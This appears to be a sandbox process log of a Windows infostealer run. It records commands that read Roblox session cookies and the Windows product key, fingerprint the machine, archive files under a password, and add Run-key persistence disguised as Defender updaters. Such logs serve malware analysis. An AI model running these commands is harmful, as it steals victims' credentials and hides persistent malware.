netsh wlan show profile
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mqzol1ve\mqzol1ve.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E10.tmp" "c:\Users\Admin\AppData\Local\Temp\mqzol1ve\CSC387C86B1DF4744029A1BF864AB54A5FB.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F58.tmp\2F59.tmp\2F5A.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\362E.tmp\362F.tmp\3630.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI16402\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\5I94M.zip" *
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3E8B.tmp\3E8C.tmp\3E8D.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\45CE.tmp\45CF.tmp\45D0.bat C:\Windows\system32\java.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DEC.tmp\4DED.tmp\4DEE.bat C:\Windows\system32\java.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\55BC.tmp\55BD.tmp\55BE.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D3E.tmp\5D3F.tmp\5D40.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64D0.tmp\64D1.tmp\64D2.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CFD.tmp\6CFE.tmp\6CFF.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7450.tmp\7451.tmp\7452.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C01.tmp\7C02.tmp\7C13.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\843E.tmp\843F.tmp\8440.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8BFF.tmp\8C00.tmp\8C01.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\947B.tmp\947C.tmp\947D.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9C5A.tmp\9C5B.tmp\9C5C.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 5
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A39E.tmp\A39F.tmp\A3A0.bat C:\Windows\system32\java.exe"
C:\Windows\system32\timeout.exe
timeout 1
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
C:\Windows\system32\java.exe
"C:\Windows\system32\java.exe"
